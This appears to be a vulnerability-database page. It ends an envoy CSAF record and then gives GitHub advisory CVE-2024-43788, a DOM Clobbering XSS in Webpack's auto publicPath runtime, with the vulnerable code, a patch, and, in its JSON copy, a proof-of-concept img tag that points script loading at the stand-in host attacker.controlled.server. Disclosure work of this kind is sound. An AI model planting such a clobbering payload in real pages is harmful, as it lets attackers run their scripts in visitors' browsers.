"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
},
{
"category": "workaround",
"details": "This flaw can be mitigated by configuring envoy to treat all IPs as external. This is done by setting the internal_address_config range for envoy to `0.0.0.0/32`.",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "envoy: Potential to manipulate `x-envoy` headers from external sources"
}
]
}
ghsa-4vvj-4cpr-p986
Vulnerability from github
Published
2024-08-27 19:50
Modified
2024-09-03 17:09
Severity ?
6.4 (Medium) - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H
6.1 (Medium) - CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N
6.1 (Medium) - CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N
Summary
Webpack's AutoPublicPathRuntimeModule has a DOM Clobbering Gadget that leads to XSS
Details
Summary
We discovered a DOM Clobbering vulnerability in Webpack’s AutoPublicPathRuntimeModule. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.
We found the real-world exploitation of this gadget in the Canvas LMS which allows XSS attack happens through an javascript code compiled by Webpack (the vulnerable part is from Webpack). We believe this is a severe issue. If Webpack’s code is not resilient to DOM Clobbering attacks, it could lead to significant security vulnerabilities in any web application using Webpack-compiled code.
Details
Backgrounds
DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:
[1] https://scnps.co/papers/sp23_domclob.pdf [2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/
Gadgets found in Webpack
We identified a DOM Clobbering vulnerability in Webpack’s AutoPublicPathRuntimeModule. When the output.publicPath field in the configuration is not set or is set to auto, the following code is generated in the bundle to dynamically resolve and load additional JavaScript files:
/******/ /* webpack/runtime/publicPath */
/******/ (() => {
/******/ var scriptUrl;
/******/ if (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + "";
/******/ var document = __webpack_require__.g.document;
/******/ if (!scriptUrl && document) {
/******/ if (document.currentScript)
/******/ scriptUrl = document.currentScript.src;
/******/ if (!scriptUrl) {
/******/ var scripts = document.getElementsByTagName("script");
/******/ if(scripts.length) {
/******/ var i = scripts.length - 1;
/******/ while (i > -1 && (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;
/******/ }
/******/ }
/******/ }
/******/ // When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration
/******/ // or pass an empty string ("") and set the __webpack_public_path__ variable from your code to use your own logic.
/******/ if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser");
/******/ scriptUrl = scriptUrl.replace(/#.*$/, "").replace(/\?.*$/, "").replace(/\/[^\/]+$/, "/");
/******/ __webpack_require__.p = scriptUrl;
/******/ })();
However, this code is vulnerable to a DOM Clobbering attack. The lookup on the line with document.currentScript can be shadowed by an attacker, causing it to return an attacker-controlled HTML element instead of the current script element as intended. In such a scenario, the src attribute of the attacker-controlled element will be used as the scriptUrl and assigned to __webpack_require__.p. If additional scripts are loaded from the server, __webpack_require__.p will be used as the base URL, pointing to the attacker's domain. This could lead to arbitrary script loading from the attacker's server, resulting in severe security risks.
PoC
Please note that we have identified a real-world exploitation of this vulnerability in the Canvas LMS. Once the issue has been patched, I am willing to share more details on the exploitation. For now, I’m providing a demo to illustrate the concept.
Consider a website developer with the following two scripts, entry.js and import1.js, that are compiled using Webpack:
// entry.js
import('./import1.js')
.then(module => {
module.hello();
})
.catch(err => {
console.error('Failed to load module', err);
});
// import1.js
export function hello () {
console.log('Hello');
}
The webpack.config.js is set up as follows: ``` const path = require('path');
module.exports = { entry: './entry.js', // Ensure the correct path to your entry file output: { filename: 'webpack-gadgets.bundle.js', // Output bundle file path: path.resolve(__dirname, 'dist'), // Output directory publicPath: "auto", // Or leave this field not set }, target: 'web', mode: 'development', }; ```
When the developer builds these scripts into a bundle and adds it to a webpage, the page could load the import1.js file from the attacker's domain, attacker.controlled.server. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.
```
```
Impact
This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes.
Patch
A possible patch to this vulnerability could refer to the Google Closure project which makes itself resistant to DOM Clobbering attack: https://github.com/google/closure-library/blob/b312823ec5f84239ff1db7526f4a75cba0420a33/closure/goog/base.js#L174
/******/ /* webpack/runtime/publicPath */
/******/ (() => {
/******/ var scriptUrl;
/******/ if (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + "";
/******/ var document = __webpack_require__.g.document;
/******/ if (!scriptUrl && document) {
/******/ if (document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT') // Assume attacker cannot control script tag, otherwise it is XSS already :>
/******/ scriptUrl = document.currentScript.src;
/******/ if (!scriptUrl) {
/******/ var scripts = document.getElementsByTagName("script");
/******/ if(scripts.length) {
/******/ var i = scripts.length - 1;
/******/ while (i > -1 && (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;
/******/ }
/******/ }
/******/ }
/******/ // When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration
/******/ // or pass an empty string ("") and set the __webpack_public_path__ variable from your code to use your own logic.
/******/ if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser");
/******/ scriptUrl = scriptUrl.replace(/#.*$/, "").replace(/\?.*$/, "").replace(/\/[^\/]+$/, "/");
/******/ __webpack_require__.p = scriptUrl;
/******/ })();
Please note that if we do not receive a response from the development team within three months, we will disclose this vulnerability to the CVE agent.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "webpack"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0-alpha.0"
},
{
"fixed": "5.94.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-43788"
],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2024-08-27T19:50:40Z",
"nvd_published_at": "2024-08-27T17:15:07Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nWe discovered a DOM Clobbering vulnerability in Webpack\u2019s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present.\n\nWe found the real-world exploitation of this gadget in the Canvas LMS which allows XSS attack happens through an javascript code compiled by Webpack (the vulnerable part is from Webpack). We believe this is a severe issue. If Webpack\u2019s code is not resilient to DOM Clobbering attacks, it could lead to significant security vulnerabilities in any web application using Webpack-compiled code.\n\n\n### Details\n\n#### Backgrounds\n\nDOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:\n\n[1] https://scnps.co/papers/sp23_domclob.pdf\n[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/\n\n\n#### Gadgets found in Webpack\n\nWe identified a DOM Clobbering vulnerability in Webpack\u2019s `AutoPublicPathRuntimeModule`. When the `output.publicPath` field in the configuration is not set or is set to `auto`, the following code is generated in the bundle to dynamically resolve and load additional JavaScript files:\n\n```\n/******/ \t/* webpack/runtime/publicPath */\n/******/ \t(() =\u003e {\n/******/ \t\tvar scriptUrl;\n/******/ \t\tif (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + \"\";\n/******/ \t\tvar document = __webpack_require__.g.document;\n/******/ \t\tif (!scriptUrl \u0026\u0026 document) {\n/******/ \t\t\tif (document.currentScript)\n/******/ \t\t\t\tscriptUrl = document.currentScript.src;\n/******/ \t\t\tif (!scriptUrl) {\n/******/ \t\t\t\tvar scripts = document.getElementsByTagName(\"script\");\n/******/ \t\t\t\tif(scripts.length) {\n/******/ \t\t\t\t\tvar i = scripts.length - 1;\n/******/ \t\t\t\t\twhile (i \u003e -1 \u0026\u0026 (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;\n/******/ \t\t\t\t}\n/******/ \t\t\t}\n/******/ \t\t}\n/******/ \t\t// When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration\n/******/ \t\t// or pass an empty string (\"\") and set the __webpack_public_path__ variable from your code to use your own logic.\n/******/ \t\tif (!scriptUrl) throw new Error(\"Automatic publicPath is not supported in this browser\");\n/******/ \t\tscriptUrl = scriptUrl.replace(/#.*$/, \"\").replace(/\\?.*$/, \"\").replace(/\\/[^\\/]+$/, \"/\");\n/******/ \t\t__webpack_require__.p = scriptUrl;\n/******/ \t})();\n```\n\nHowever, this code is vulnerable to a DOM Clobbering attack. The lookup on the line with `document.currentScript` can be shadowed by an attacker, causing it to return an attacker-controlled HTML element instead of the current script element as intended. In such a scenario, the `src` attribute of the attacker-controlled element will be used as the `scriptUrl` and assigned to `__webpack_require__.p`. If additional scripts are loaded from the server, `__webpack_require__.p` will be used as the base URL, pointing to the attacker\u0027s domain. This could lead to arbitrary script loading from the attacker\u0027s server, resulting in severe security risks.\n\n### PoC\n\nPlease note that we have identified a real-world exploitation of this vulnerability in the Canvas LMS. Once the issue has been patched, I am willing to share more details on the exploitation. For now, I\u2019m providing a demo to illustrate the concept.\n\nConsider a website developer with the following two scripts, `entry.js` and `import1.js`, that are compiled using Webpack:\n\n```\n// entry.js\nimport(\u0027./import1.js\u0027)\n .then(module =\u003e {\n module.hello();\n })\n .catch(err =\u003e {\n console.error(\u0027Failed to load module\u0027, err);\n });\n```\n\n```\n// import1.js\nexport function hello () {\n console.log(\u0027Hello\u0027);\n}\n```\n\nThe webpack.config.js is set up as follows:\n```\nconst path = require(\u0027path\u0027);\n\nmodule.exports = {\n entry: \u0027./entry.js\u0027, // Ensure the correct path to your entry file\n output: {\n filename: \u0027webpack-gadgets.bundle.js\u0027, // Output bundle file\n path: path.resolve(__dirname, \u0027dist\u0027), // Output directory\n publicPath: \"auto\", // Or leave this field not set\n },\n target: \u0027web\u0027,\n mode: \u0027development\u0027,\n};\n```\n\nWhen the developer builds these scripts into a bundle and adds it to a webpage, the page could load the `import1.js` file from the attacker\u0027s domain, `attacker.controlled.server`. The attacker only needs to insert an `img` tag with the `name` attribute set to `currentScript`. This can be done through a website\u0027s feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.\n\n```\n\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n\u003chead\u003e\n \u003ctitle\u003eWebpack Example\u003c/title\u003e\n \u003c!-- Attacker-controlled Script-less HTML Element starts--!\u003e\n \u003cimg name=\"currentScript\" src=\"https://attacker.controlled.server/\"\u003e\u003c/img\u003e\n \u003c!-- Attacker-controlled Script-less HTML Element ends--!\u003e\n\u003c/head\u003e\n\u003cscript src=\"./dist/webpack-gadgets.bundle.js\"\u003e\u003c/script\u003e\n\u003cbody\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\n### Impact\n\nThis vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes.\n\n### Patch\n\nA possible patch to this vulnerability could refer to the Google Closure project which makes itself resistant to DOM Clobbering attack: https://github.com/google/closure-library/blob/b312823ec5f84239ff1db7526f4a75cba0420a33/closure/goog/base.js#L174\n\n```\n/******/ \t/* webpack/runtime/publicPath */\n/******/ \t(() =\u003e {\n/******/ \t\tvar scriptUrl;\n/******/ \t\tif (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + \"\";\n/******/ \t\tvar document = __webpack_require__.g.document;\n/******/ \t\tif (!scriptUrl \u0026\u0026 document) {\n/******/ \t\t\tif (document.currentScript \u0026\u0026 document.currentScript.tagName.toUpperCase() === \u0027SCRIPT\u0027) // Assume attacker cannot control script tag, otherwise it is XSS already :\u003e\n/******/ \t\t\t\tscriptUrl = document.currentScript.src;\n/******/ \t\t\tif (!scriptUrl) {\n/******/ \t\t\t\tvar scripts = document.getElementsByTagName(\"script\");\n/******/ \t\t\t\tif(scripts.length) {\n/******/ \t\t\t\t\tvar i = scripts.length - 1;\n/******/ \t\t\t\t\twhile (i \u003e -1 \u0026\u0026 (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;\n/******/ \t\t\t\t}\n/******/ \t\t\t}\n/******/ \t\t}\n/******/ \t\t// When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration\n/******/ \t\t// or pass an empty string (\"\") and set the __webpack_public_path__ variable from your code to use your own logic.\n/******/ \t\tif (!scriptUrl) throw new Error(\"Automatic publicPath is not supported in this browser\");\n/******/ \t\tscriptUrl = scriptUrl.replace(/#.*$/, \"\").replace(/\\?.*$/, \"\").replace(/\\/[^\\/]+$/, \"/\");\n/******/ \t\t__webpack_require__.p = scriptUrl;\n/******/ \t})();\n```\n\nPlease note that if we do not receive a response from the development team within three months, we will disclose this vulnerability to the CVE agent.",
"id": "GHSA-4vvj-4cpr-p986",
"modified": "2024-09-03T17:09:18Z",
"published": "2024-08-27T19:50:40Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"type": "WEB",
"url": "https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270"
},
{
"type": "WEB",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"type": "PACKAGE",
"url": "https://github.com/webpack/webpack"
},
{
"type": "WEB",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"type": "WEB",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Webpack\u0027s AutoPublicPathRuntimeModule has a DOM Clobbering Gadget that leads to XSS"
}
Loading...
Loading...
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.